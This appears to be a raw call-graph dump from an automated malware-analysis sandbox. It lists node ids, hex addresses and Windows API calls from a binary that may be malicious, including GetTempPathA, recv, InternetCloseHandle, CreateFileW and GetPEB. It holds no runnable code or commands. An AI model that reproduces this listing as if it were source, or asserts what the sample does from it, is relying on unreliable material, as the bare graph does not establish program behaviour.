14683->14704 14686 5dc5af GetSystemTimePreciseAsFileTime 14684->14686 14692 5dc5af GetSystemTimePreciseAsFileTime 14685->14692 14685->14704 14687 5c2e12 14686->14687 14688 5c2e1d 14687->14688 14689 5c2f1e 14687->14689 14693 5dd2e8 RtlAllocateHeap 14688->14693 14694 5c2e30 __Mtx_unlock 14688->14694 14690 5dc16d 13 API calls 14689->14690 14691 5c2f24 14690->14691 14695 5dc16d 13 API calls 14691->14695 14696 5c2eb9 14692->14696 14693->14694 14694->14691 14697 5c2e6f 14694->14697 14695->14696 14698 5dc16d 13 API calls 14696->14698 14699 5c2ec0 __Mtx_unlock 14696->14699 14697->14683 14697->14704 14698->14699 14700 5dc16d 13 API calls 14699->14700 14701 5c2ed8 __Cnd_broadcast 14699->14701 14700->14701 14702 5dc16d 13 API calls 14701->14702 14701->14704 14703 5c2f3c 14702->14703 14705 5dc5af GetSystemTimePreciseAsFileTime 14703->14705 14704->14652 14713 5c2f80 shared_ptr __Mtx_unlock 14705->14713 14706 5c30c5 14707 5dc16d 13 API calls 14706->14707 14708 5c30cb 14707->14708 14709 5dc16d 13 API calls 14708->14709 14710 5c30d1 14709->14710 14711 5dc16d 13 API calls 14710->14711 14719 5c3093 __Mtx_unlock 14711->14719 14712 5c30a7 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14712->14652 14713->14706 14713->14708 14713->14712 14716 5c3032 GetCurrentThreadId 14713->14716 14714 5dc16d 13 API calls 14715 5c30dd 14714->14715 14716->14712 14717 5c303b 14716->14717 14717->14712 14718 5dc5af GetSystemTimePreciseAsFileTime 14717->14718 14720 5c305f 14718->14720 14719->14712 14719->14714 14720->14706 14720->14710 14720->14719 14722 5dbc4c 14720->14722 14725 5dba72 14722->14725 14724 5dbc5c 14724->14720 14726 5dba9c 14725->14726 14727 5dce6e _xtime_get GetSystemTimePreciseAsFileTime 14726->14727 14729 5dbaa4 __Xtime_diff_to_millis2 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14726->14729 14728 5dbacf __Xtime_diff_to_millis2 14727->14728 14728->14729 14730 5dce6e _xtime_get GetSystemTimePreciseAsFileTime 14728->14730 14729->14724 14730->14729 14732 5dc0bc RtlAllocateHeap 14731->14732 14733 5d90ea 14732->14733 14735 5dd2e8 RtlAllocateHeap 14734->14735 14736 5c2b0e 14735->14736 14744 5db747 14736->14744 14738 5c2b49 14738->14647 14739 5c2b42 14739->14738 14750 5c2b80 14739->14750 14741 5c2b58 14753 5c2460 14741->14753 14743 5c2b65 std::_Xinvalid_argument 14745 5db754 14744->14745 14749 5db773 Concurrency::details::_Reschedule_chore 14744->14749 14756 5dca7a 14745->14756 14747 5db764 14747->14749 14758 5db71e 14747->14758 14749->14739 14764 5db6fb 14750->14764 14752 5c2bb2 shared_ptr 14752->14741 14754 5f37bc ___std_exception_copy RtlAllocateHeap 14753->14754 14755 5c2497 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14754->14755 14755->14743 14757 5dca95 CreateThreadpoolWork 14756->14757 14757->14747 14759 5db727 Concurrency::details::_Reschedule_chore 14758->14759 14762 5dcccf 14759->14762 14761 5db741 14761->14749 14763 5dcce4 TpPostWork 14762->14763 14763->14761 14765 5db707 14764->14765 14766 5db717 14764->14766 14765->14766 14768 5dc97b 14765->14768 14766->14752 14769 5dc990 TpReleaseWork 14768->14769 14769->14766 14791 5d2df0 14792 5d2e95 14791->14792 14793 5d7840 RtlAllocateHeap 14792->14793 14794 5d2ea1 14793->14794 14795 5c5b00 RtlAllocateHeap 14794->14795 14796 5d2eac 14795->14796 14797 5d7f00 RtlAllocateHeap 14796->14797 14798 5d2eef 14797->14798 14799 5d7840 RtlAllocateHeap 14798->14799 14800 5d323c __cftof 14799->14800 14801 5d32c2 InternetCloseHandle InternetCloseHandle 14800->14801 14802 5d3301 14801->14802 14803 5d7840 RtlAllocateHeap 14802->14803 14804 5d3394 14803->14804 14805 5c5b00 RtlAllocateHeap 14804->14805 14806 5d339b 14805->14806 14807 5d7840 RtlAllocateHeap 14806->14807 14808 5d33ae 14807->14808 14809 5d7840 RtlAllocateHeap 14808->14809 14810 5d33c3 14809->14810 14811 5d7840 RtlAllocateHeap 14810->14811 14812 5d33d8 14811->14812 14813 5d7840 RtlAllocateHeap 14812->14813 14814 5d33ea 14813->14814 14815 5ce410 7 API calls 14814->14815 14817 5d33f3 14815->14817 14816 5d34ea shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14817->14816 14818 5d7f00 RtlAllocateHeap 14817->14818 14819 5d3590 14818->14819 14820 5d7f00 RtlAllocateHeap 14819->14820 14821 5d35df 14820->14821 14822 5d7f00 RtlAllocateHeap 14821->14822 14823 5d3623 14822->14823 14824 5d7f00 RtlAllocateHeap 14823->14824 14825 5d3665 14824->14825 14826 5d7840 RtlAllocateHeap 14825->14826 14827 5d3678 14826->14827 14828 5c5b00 RtlAllocateHeap 14827->14828 14829 5d3683 14828->14829 14830 5d7f00 RtlAllocateHeap 14829->14830 14832 5d36f1 shared_ptr 14830->14832 14831 5c9800 RtlAllocateHeap 14833 5d3752 14831->14833 14832->14831 14834 5d7840 RtlAllocateHeap 14833->14834 14835 5d3769 14834->14835 14836 5c5b00 RtlAllocateHeap 14835->14836 14837 5d3774 14836->14837 14838 5d7f00 RtlAllocateHeap 14837->14838 14839 5d37bc 14838->14839 14840 5d8040 RtlAllocateHeap 14839->14840 14841 5d4220 14840->14841 14842 5dc09c std::_Xinvalid_argument RtlAllocateHeap 14841->14842 14843 5d4234 14842->14843 14844 5dc0dc RtlAllocateHeap 14843->14844 14845 5d4243 14844->14845 13917 5db82e 13922 5db6b5 13917->13922 13919 5db856 13930 5db618 13919->13930 13921 5db86f 13923 5db6c1 Concurrency::details::_Reschedule_chore 13922->13923 13925 5db6f2 13923->13925 13940 5dc5af 13923->13940 13925->13919 13928 5db6dc __Mtx_unlock 13929 5c2a10 13 API calls 13928->13929 13929->13925 13931 5db624 Concurrency::details::_Reschedule_chore 13930->13931 13932 5db67e 13931->13932 13933 5dc5af GetSystemTimePreciseAsFileTime 13931->13933 13932->13921 13934 5db639 13933->13934 13935 5c2a10 13 API calls 13934->13935 13936 5db63f __Mtx_unlock 13935->13936 13937 5c2a10 13 API calls 13936->13937 13938 5db65c __Cnd_broadcast 13937->13938 13938->13932 13939 5c2a10 13 API calls 13938->13939 13939->13932 13950 5dc355 13940->13950 13942 5db6d6 13943 5c2a10 13942->13943 13944 5c2a1c 13943->13944 13945 5c2a1a 13943->13945 13967 5dc16d 13944->13967 13945->13928 13951 5dc3ab 13950->13951 13953 5dc37d __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13950->13953 13951->13953 13956 5dce6e 13951->13956 13953->13942 13954 5dc400 __Xtime_diff_to_millis2 13954->13953 13955 5dce6e _xtime_get GetSystemTimePreciseAsFileTime 13954->13955 13955->13954 13957 5dce7d 13956->13957 13959 5dce8a __aulldvrm 13956->13959 13957->13959 13960 5dce47 13957->13960 13959->13954 13963 5dcaed 13960->13963 13964 5dcafe GetSystemTimePreciseAsFileTime 13963->13964 13965 5dcb0a 13963->13965 13964->13965 13965->13959 13968 5dc195 13967->13968 13969 5dc177 13967->13969 13968->13968 13969->13968 13971 5dc19a 13969->13971 13976 5c29e0 13971->13976 13973 5dc1b1 13992 5dc102 13973->13992 13975 5dc1c2 std::_Xinvalid_argument 13975->13969 13998 5dbddf 13976->13998 13978 5c29ff 13978->13973 13979 5f8a8f __cftof 4 API calls 13980 5f6c06 13979->13980 13981 5f6c15 13980->13981 13982 5f6c23 13980->13982 13983 5f6c79 12 API calls 13981->13983 13984 5f689d 5 API calls 13982->13984 13986 5f6c1f 13983->13986 13987 5f6c3d 13984->13987 13985 5c29f4 __cftof 13985->13978 13985->13979 13986->13973 13988 5f67fd RtlAllocateHeap 13987->13988 13989 5f6c4a 13988->13989 13990 5f6c79 12 API calls 13989->13990 13991 5f6c51 __freea 13989->13991 13990->13991 13991->13973 13993 5dc10e __EH_prolog3_GS 13992->13993 13994 5d7f00 RtlAllocateHeap 13993->13994 13995 5dc140 13994->13995 14005 5c25b0 13995->14005 13997 5dc155 13997->13975 14001 5dcb34 13998->14001 14002 5dcb42 InitOnceExecuteOnce 14001->14002 14004 5dbdf2 14001->14004 14002->14004 14004->13985 14006 5d7840 RtlAllocateHeap 14005->14006 14007 5c2602 14006->14007 14008 5c2625 14007->14008 14009 5d8e40 RtlAllocateHeap 14007->14009 14010 5d8e40 RtlAllocateHeap 14008->14010 14012 5c268e shared_ptr 14008->14012 14009->14008 14010->14012 14011 5f37bc ___std_exception_copy RtlAllocateHeap 14013 5c274b shared_ptr ___std_exception_destroy __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14011->14013 14012->14011 14012->14013 14013->13997 12770 5f6bcb 12775 5f6bd7 __cftof 12770->12775 12772 5f6c06 12773 5f6c15 12772->12773 12774 5f6c23 12772->12774 12776 5f6c79 12 API calls 12773->12776 12792 5f689d 12774->12792 12784 5f8a8f 12775->12784 12778 5f6c1f 12776->12778 12779 5f6c3d 12795 5f67fd 12779->12795 12783 5f6c51 __freea 12785 5f8a94 __cftof 12784->12785 12788 5f8a9f __cftof 12785->12788 12812 5fd4d4 12785->12812 12809 5f64fd 12788->12809 12789 5fd707 RtlAllocateHeap 12790 5fd71a __dosmaperr 12789->12790 12791 5f8ad2 __cftof 12789->12791 12790->12772 12791->12789 12791->12790 12831 5f681a 12792->12831 12794 5f68af 12794->12779 12867 5f674b 12795->12867 12797 5f6815 12797->12783 12798 5f6c79 12797->12798 12799 5f6ca4 __cftof 12798->12799 12800 5f6c87 __cftof __dosmaperr 12798->12800 12801 5f6cca __cftof __dosmaperr 12799->12801 12802 5f6ce6 CreateFileW 12799->12802 12800->12783 12801->12783 12803 5f6d0a 12802->12803 12804 5f6d18 12802->12804 12885 5f6de1 GetFileType 12803->12885 12899 5f6d57 12804->12899 12807 5f6d49 FindCloseChangeNotification 12807->12801 12808 5f6d13 __cftof 12808->12801 12808->12807 12819 5f63d7 12809->12819 12813 5fd4e0 __cftof 12812->12813 12814 5f64fd __cftof 2 API calls 12813->12814 12815 5fd53c __cftof __dosmaperr 12813->12815 12818 5fd6ce __cftof 12814->12818 12815->12788 12816 5fd707 RtlAllocateHeap 12817 5fd71a __dosmaperr 12816->12817 12816->12818 12817->12788 12818->12816 12818->12817 12820 5f63e5 __cftof 12819->12820 12821 5f6430 12820->12821 12824 5f643b 12820->12824 12821->12791 12829 5fa1a2 GetPEB 12824->12829 12826 5f6445 12827 5f644a GetPEB 12826->12827 12828 5f645a __cftof 12826->12828 12827->12828 12830 5fa1bc __cftof 12829->12830 12830->12826 12832 5f6831 12831->12832 12833 5f683a 12831->12833 12832->12794 12833->12832 12837 5fb49b 12833->12837 12838 5fb4ae 12837->12838 12839 5f6870 12837->12839 12838->12839 12845 5ff44b 12838->12845 12841 5fb4c8 12839->12841 12842 5fb4db 12841->12842 12844 5fb4f0 12841->12844 12842->12844 12850 5fe551 12842->12850 12844->12832 12847 5ff457 __cftof 12845->12847 12846 5ff4a6 12846->12839 12847->12846 12848 5f8a8f __cftof 4 API calls 12847->12848 12849 5ff4cb 12848->12849 12851 5fe55b 12850->12851 12854 5fe469 12851->12854 12853 5fe561 12853->12844 12857 5fe475 __cftof __freea 12854->12857 12855 5fe496 12855->12853 12856 5f8a8f __cftof 4 API calls 12858 5fe508 12856->12858 12857->12855 12857->12856 12859 5fe544 12858->12859 12863 5fa5ce 12858->12863 12859->12853 12864 5fa5f1 12863->12864 12865 5f8a8f __cftof 4 API calls 12864->12865 12866 5fa667 12865->12866 12868 5f6773 12867->12868 12873 5f6759 __dosmaperr __fassign 12867->12873 12869 5f677a 12868->12869 12871 5f6799 __fassign 12868->12871 12869->12873 12874 5f68f6 12869->12874 12872 5f68f6 RtlAllocateHeap 12871->12872 12871->12873 12872->12873 12873->12797 12875 5f6904 12874->12875 12878 5f6935 12875->12878 12881 5faeeb 12878->12881 12880 5f6915 12880->12873 12883 5faf27 __dosmaperr 12881->12883 12884 5faef9 __cftof 12881->12884 12882 5faf14 RtlAllocateHeap 12882->12883 12882->12884 12883->12880 12884->12882 12884->12883 12886 5f6e1c 12885->12886 12898 5f6eb2 __dosmaperr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 12885->12898 12887 5f6e36 __cftof 12886->12887 12921 5f7157 12886->12921 12889 5f6e55 GetFileInformationByHandle 12887->12889 12887->12898 12890 5f6e6b 12889->12890 12889->12898 12907 5f70a9 12890->12907 12894 5f6e88 12895 5f6f51 SystemTimeToTzSpecificLocalTime 12894->12895 12896 5f6e9b 12895->12896 12897 5f6f51 SystemTimeToTzSpecificLocalTime 12896->12897 12897->12898 12898->12808 12944 5f72f4 12899->12944 12901 5f6d65 12902 5f6d6a __dosmaperr 12901->12902 12903 5f70a9 5 API calls 12901->12903 12902->12808 12904 5f6d83 12903->12904 12905 5f7157 RtlAllocateHeap 12904->12905 12906 5f6da2 12905->12906 12906->12808 12908 5f70bf _wcsrchr 12907->12908 12911 5f6e77 12908->12911 12925 5fb9c4 12908->12925 12910 5f7103 12910->12911 12912 5fb9c4 5 API calls 12910->12912 12917 5f6f51 12911->12917 12913 5f7114 12912->12913 12913->12911 12914 5fb9c4 5 API calls 12913->12914 12915 5f7125 12914->12915 12915->12911 12916 5fb9c4 5 API calls 12915->12916 12916->12911 12918 5f6f69 12917->12918 12919 5f6f89 SystemTimeToTzSpecificLocalTime 12918->12919 12920 5f6f6f __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 12918->12920 12919->12920 12920->12894 12922 5f7170 12921->12922 12924 5f7184 __dosmaperr 12922->12924 12936 5fb548 12922->12936 12924->12887 12928 5fb9d2 12925->12928 12927 5fba08 12927->12910 12929 5fb9d8 __cftof __dosmaperr 12928->12929 12930 5fba0d 12928->12930 12929->12910 12931 5fba37 12930->12931 12934 5fba1d __cftof __dosmaperr 12930->12934 12932 5f681a __cftof 5 API calls 12931->12932 12931->12934 12935 5fba61 12932->12935 12933 5fb985 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 12933->12935 12934->12927 12935->12933 12935->12934 12937 5fb572 __cftof 12936->12937 12939 5fb58e __dosmaperr __freea __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 12937->12939 12940 5fd6cf 12937->12940 12939->12924 12941 5fd6dc __cftof 12940->12941 12942 5fd707 RtlAllocateHeap 12941->12942 12943 5fd71a __dosmaperr 12941->12943 12942->12941 12942->12943 12943->12939 12945 5f7318 12944->12945 12947 5f731e ___std_exception_copy __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 12945->12947 12948 5f7016 12945->12948 12947->12901 12949 5f7022 __dosmaperr 12948->12949 12954 5fb85b 12949->12954 12951 5f703a __dosmaperr 12952 5f7048 12951->12952 12953 5fb85b 2 API calls 12951->12953 12952->12947 12953->12952 12957 5fb6be 12954->12957 12956 5fb874 12956->12951 12958 5fb6ce 12957->12958 12959 5fb73a 12957->12959 12958->12959 12960 5fb6d5 12958->12960 12974 601ed8 12959->12974 12965 5fb6e2 ___std_exception_copy 12960->12965 12966 5fb655 12960->12966 12963 5fb71b 12970 5fb7f5 12963->12970 12965->12956 12967 5fb670 12966->12967 12969 5fb675 __dosmaperr 12967->12969 12977 5fb797 12967->12977 12969->12963 12971 5fb802 12970->12971 12973 5fb81b __cftof 12970->12973 12972 5f8a84 ___std_exception_copy RtlAllocateHeap 12971->12972 12971->12973 12972->12973 12973->12965 12988 601d02 12974->12988 12976 601eef 12976->12965 12978 5fb7a5 12977->12978 12981 5fb7d6 12978->12981 12984 5f8a84 12981->12984 12983 5fb7b6 12983->12969 12985 5faeeb __cftof 12984->12985 12986 5faf14 RtlAllocateHeap 12985->12986 12987 5faf27 __dosmaperr 12985->12987 12986->12985 12986->12987 12987->12983 12989 601d34 12988->12989 12997 601d20 __cftof __dosmaperr ___std_exception_copy __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 12988->12997 12990 5fb548 RtlAllocateHeap 12989->12990 12991 601d3c 12989->12991 12990->12991 12992 5fb797 RtlAllocateHeap 12991->12992 12991->12997 12993 601dc9 12992->12993 12994 5fb655 RtlAllocateHeap 12993->12994 12995 601dd6 12994->12995 12996 5fb7f5 RtlAllocateHeap 12995->12996 12995->12997 12996->12997 12997->12976 12998 5c8a40 GetTempPathA 13009 5d7840 12998->13009 13000 5c8a9c 13020 5c5b00 13000->13020 13002 5c8aa7 13027 5d7f00 13002->13027 13004 5c8af3 13005 5d7f00 RtlAllocateHeap 13004->13005 13006 5c8b45 13005->13006 13040 5d8060 13006->13040 13008 5c8b57 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13010 5d7866 13009->13010 13011 5d786d 13010->13011 13012 5d78c1 13010->13012 13013 5d78a2 13010->13013 13011->13000 13016 5dd2e8 RtlAllocateHeap 13012->13016 13019 5d78af __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 13012->13019 13014 5d78f9 13013->13014 13015 5d78a9 13013->13015 13056 5c2380 13014->13056 13048 5dd2e8 13015->13048 13016->13019 13019->13000 13064 5c5830 13020->13064 13024 5c5b5a 13083 5c4ad0 13024->13083 13026 5c5b6b shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13026->13002 13029 5d7f1e 13027->13029 13031 5d7f44 13027->13031 13028 5d9170 RtlAllocateHeap 13030 5d8033 13028->13030 13029->13004 13032 5c2380 RtlAllocateHeap 13030->13032 13033 5d7fbd 13031->13033 13034 5d7f98 13031->13034 13038 5d7fa9 13031->13038 13035 5d8038 13032->13035 13036 5dd2e8 RtlAllocateHeap 13033->13036 13033->13038 13034->13030 13037 5dd2e8 RtlAllocateHeap 13034->13037 13036->13038 13037->13038 13038->13028 13039 5d8010 shared_ptr 13038->13039 13039->13004 13041 5d8088 13040->13041 13042 5d80d2 13040->13042 13041->13042 13043 5d8091 13041->13043 13047 5d80e1 13042->13047 13135 5d8e40 13042->13135 13130 5d9180 13043->13130 13046 5d809a 13046->13008 13047->13008 13050 5dd2ed __cftof 13048->13050 13049 5f8a84 ___std_exception_copy RtlAllocateHeap 13049->13050 13050->13049 13051 5dd307 13050->13051 13052 5c2380 std::_Xinvalid_argument 13050->13052 13051->13019 13055 5dd313 std::_Xinvalid_argument 13052->13055 13060 5f37bc 13052->13060 13054 5c23c3 13054->13019 13055->13019 13057 5c238e std::_Xinvalid_argument 13056->13057 13058 5f37bc ___std_exception_copy RtlAllocateHeap 13057->13058 13059 5c23c3 13058->13059 13059->13019 13061 5f37e6 ___std_exception_copy 13060->13061 13062 5f37c9 13060->13062 13061->13054 13062->13061 13063 5f8a84 ___std_exception_copy RtlAllocateHeap 13062->13063 13063->13061 13090 5d7dc0 13064->13090 13066 5c585b 13067 5c58d0 13066->13067 13068 5d7dc0 RtlAllocateHeap 13067->13068 13081 5c5935 13068->13081 13069 5d7840 RtlAllocateHeap 13069->13081 13070 5c5af9 13121 5d8040 13070->13121 13071 5c5acd __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13071->13024 13073 5d7f00 RtlAllocateHeap 13073->13081 13075 5c5830 RtlAllocateHeap 13077 5c5b44 13075->13077 13078 5c58d0 RtlAllocateHeap 13077->13078 13079 5c5b5a 13078->13079 13080 5c4ad0 RtlAllocateHeap 13079->13080 13082 5c5b6b shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13080->13082 13081->13069 13081->13070 13081->13071 13081->13073 13115 5c5620 13081->13115 13082->13024 13084 5c4b2e 13083->13084 13085 5c4b04 13083->13085 13088 5d7dc0 RtlAllocateHeap 13084->13088 13086 5d7f00 RtlAllocateHeap 13085->13086 13087 5c4b1b __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13086->13087 13087->13026 13089 5c4b8b __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13088->13089 13089->13026 13092 5d7e07 13090->13092 13093 5d7dde __cftof 13090->13093 13095 5d7e7e 13092->13095 13096 5d7e5b 13092->13096 13101 5d7e6c __cftof 13092->13101 13093->13066 13094 5d7ef8 13097 5c2380 RtlAllocateHeap 13094->13097 13100 5dd2e8 RtlAllocateHeap 13095->13100 13095->13101 13096->13094 13099 5dd2e8 RtlAllocateHeap 13096->13099 13098 5d7efd 13097->13098 13099->13101 13100->13101 13102 5d7ed5 shared_ptr 13101->13102 13103 5d9170 13101->13103 13102->13066 13106 5dc0bc 13103->13106 13109 5dc026 13106->13109 13108 5dc0cd std::_Xinvalid_argument 13112 5c21e0 13109->13112 13111 5dc038 13111->13108 13113 5f37bc ___std_exception_copy RtlAllocateHeap 13112->13113 13114 5c2217 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13113->13114 13114->13111 13119 5c5750 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13115->13119 13120 5c5689 shared_ptr 13115->13120 13116 5c581a 13117 5d8040 RtlAllocateHeap 13116->13117 13117->13119 13118 5d7f00 RtlAllocateHeap 13118->13120 13119->13081 13120->13116 13120->13118 13120->13119 13124 5dc0dc 13121->13124 13123 5c5afe 13123->13075 13127 5dc060 13124->13127 13126 5dc0ed std::_Xinvalid_argument 13126->13123 13128 5c21e0 std::future_error::future_error RtlAllocateHeap 13127->13128 13129 5dc072 13128->13129 13129->13126 13131 5d9194 13130->13131 13134 5d91a5 13131->13134 13153 5d93e0 13131->13153 13133 5d922b 13133->13046 13134->13046 13136 5d8f8e 13135->13136 13137 5d8e6b 13135->13137 13138 5d9170 RtlAllocateHeap 13136->13138 13141 5d8edc 13137->13141 13142 5d8eb2 13137->13142 13139 5d8f93 13138->13139 13140 5c2380 RtlAllocateHeap 13139->13140 13146 5d8ec3 13140->13146 13145 5dd2e8 RtlAllocateHeap 13141->13145 13141->13146 13142->13139 13143 5d8ebd 13142->13143 13144 5dd2e8 RtlAllocateHeap 13143->13144 13144->13146 13145->13146 13147 5d8fb8 13146->13147 13149 5d8f4c shared_ptr 13146->13149 13150 5c2380 std::_Xinvalid_argument 13146->13150 13148 5dd2e8 RtlAllocateHeap 13147->13148 13148->13149 13149->13047 13151 5f37bc ___std_exception_copy RtlAllocateHeap 13150->13151 13152 5c23c3 13151->13152 13152->13047 13154 5d9519 13153->13154 13155 5d940b 13153->13155 13156 5d9170 RtlAllocateHeap 13154->13156 13159 5d9479 13155->13159 13160 5d9452 13155->13160 13157 5d951e 13156->13157 13158 5c2380 RtlAllocateHeap 13157->13158 13164 5d9463 shared_ptr 13158->13164 13162 5dd2e8 RtlAllocateHeap 13159->13162 13159->13164 13160->13157 13161 5d945d 13160->13161 13163 5dd2e8 RtlAllocateHeap 13161->13163 13162->13164 13163->13164 13164->13133 13165 5c73e0 13166 5d7840 RtlAllocateHeap 13165->13166 13167 5c7415 13166->13167 13168 5d7840 RtlAllocateHeap 13167->13168 13169 5c7428 13168->13169 13170 5d7840 RtlAllocateHeap 13169->13170 13171 5c7438 13170->13171 13172 5d7840 RtlAllocateHeap 13171->13172 13173 5c744d 13172->13173 13174 5d7840 RtlAllocateHeap 13173->13174 13175 5c7462 13174->13175 13176 5d7840 RtlAllocateHeap 13175->13176 13177 5c7474 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 13176->13177 14094 5c90c0 14095 5c90f5 14094->14095 14096 5d7f00 RtlAllocateHeap 14095->14096 14097 5c9128 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14096->14097 14581 5cb0a0 14582 5cb0f2 14581->14582 14583 5d7f00 RtlAllocateHeap 14582->14583 14584 5cb133 14583->14584 14585 5d7840 RtlAllocateHeap 14584->14585 14586 5cb1dd 14585->14586 14594 5c7940 14595 5d7840 RtlAllocateHeap 14594->14595 14596 5c798b 14595->14596 14597 5c5b00 RtlAllocateHeap 14596->14597 14598 5c7993 14597->14598 14599 5d8160 RtlAllocateHeap 14598->14599 14600 5c79a3 14599->14600 14601 5d7840 RtlAllocateHeap 14600->14601 14602 5c79be 14601->14602 14603 5c5b00 RtlAllocateHeap 14602->14603 14604 5c79c5 14603->14604 14605 5d7f00 RtlAllocateHeap 14604->14605 14607 5c79e8 shared_ptr 14605->14607 14606 5c7a55 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14607->14606 14628 5c6d20 14607->14628 14609 5d7840 RtlAllocateHeap 14611 5c7b25 14609->14611 14610 5c7acb shared_ptr 14610->14609 14627 5c7bb6 shared_ptr __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14610->14627 14612 5c5b00 RtlAllocateHeap 14611->14612 14613 5c7b2d 14612->14613 14614 5d7840 RtlAllocateHeap 14613->14614 14615 5c7b48 14614->14615 14616 5c5b00 RtlAllocateHeap 14615->14616 14617 5c7b50 14616->14617 14618 5d8160 RtlAllocateHeap 14617->14618 14619 5c7b61 14618->14619 14620 5d8060 RtlAllocateHeap 14619->14620 14621 5c7b71 14620->14621 14622 5d7840 RtlAllocateHeap 14621->14622 14623 5c7b8c 14622->14623 14624 5c5b00 RtlAllocateHeap 14623->14624 14625 5c7b93 14624->14625 14626 5d7f00 RtlAllocateHeap 14625->14626 14626->14627 14629 5c6d60 14628->14629 14630 5c6d7a 14629->14630 14631 5c6da5 14629->14631 14632 5d7f00 RtlAllocateHeap 14630->14632 14633 5d7f00 RtlAllocateHeap 14631->14633 14634 5c6d9b shared_ptr 14632->14634 14633->14634 14634->14610 14846 5ce3e0 14847 5ce406 14846->14847 14848 5ce3e9 14846->14848 14850 5ce240 14848->14850 14851 5ce250 __dosmaperr 14850->14851 14852 5f8959 5 API calls 14851->14852 14853 5ce28d 14852->14853 14854 5dc09c std::_Xinvalid_argument RtlAllocateHeap 14853->14854 14856 5ce3de 14854->14856 14855 5ce406 14855->14847 14856->14855 14857 5ce240 6 API calls 14856->14857 14857->14855 14881 5cdfa0 recv 14882 5ce002 recv 14881->14882 14883 5ce037 recv 14882->14883 14884 5ce071 14883->14884 14885 5ce193 __ehhandler$?PrimaryInvocation@UMSFreeVirtualProcessorRoot@details@Concurrency@@CGXW4_RTL_UMS_SCHEDULER_REASON@@KPAX@Z 14884->14885 14886 5dc5af GetSystemTimePreciseAsFileTime 14884->14886 14887 5ce1ce 14886->14887 14888 5dc16d 13 API calls 14887->14888 14889 5ce238 14888->14889 13178 5d1da0 13179 5d7f00 RtlAllocateHeap 13178->13179 13180 5d1e3b 13179->13180 13181 5d1eb8 13180->13181 13182 5d1e48 13180->13182 13183 5d7f00 RtlAllocateHeap 13181->13183 13184 5d7840 RtlAllocateHeap 13182->13184 13189 5d1ef7 shared_ptr 13183->13189 13185 5d1e62 13184->13185 13186 5c5b00 RtlAllocateHeap 13185->13186 13187 5d1e69 13186->13187 13188 5d7840 RtlAllocateHeap 13187->13188 13191 5d1e7f 13188->13191 13190 5d2011 13189->13190 13193 5d1f8f 13189->13193 13194 5d2da5 13189->13194 13222 5d2906 shared_ptr 13189->13222 13192 5d7840 RtlAllocateHeap 13190->13192 13195 5d7840 RtlAllocateHeap 13191->13195 13199 5d2020 13192->13199 13196 5d7f00 RtlAllocateHeap 13193->13196 13198 5d8040 RtlAllocateHeap 13194->13198 13197 5d1e97 13195->13197 13208 5d1fb3 shared_ptr 13196->13208 13200 5d7840 RtlAllocateHeap 13197->13200 13201 5d2daa 13198->13201 13202 5c5b00 RtlAllocateHeap 13199->13202 13282 5d1eaf 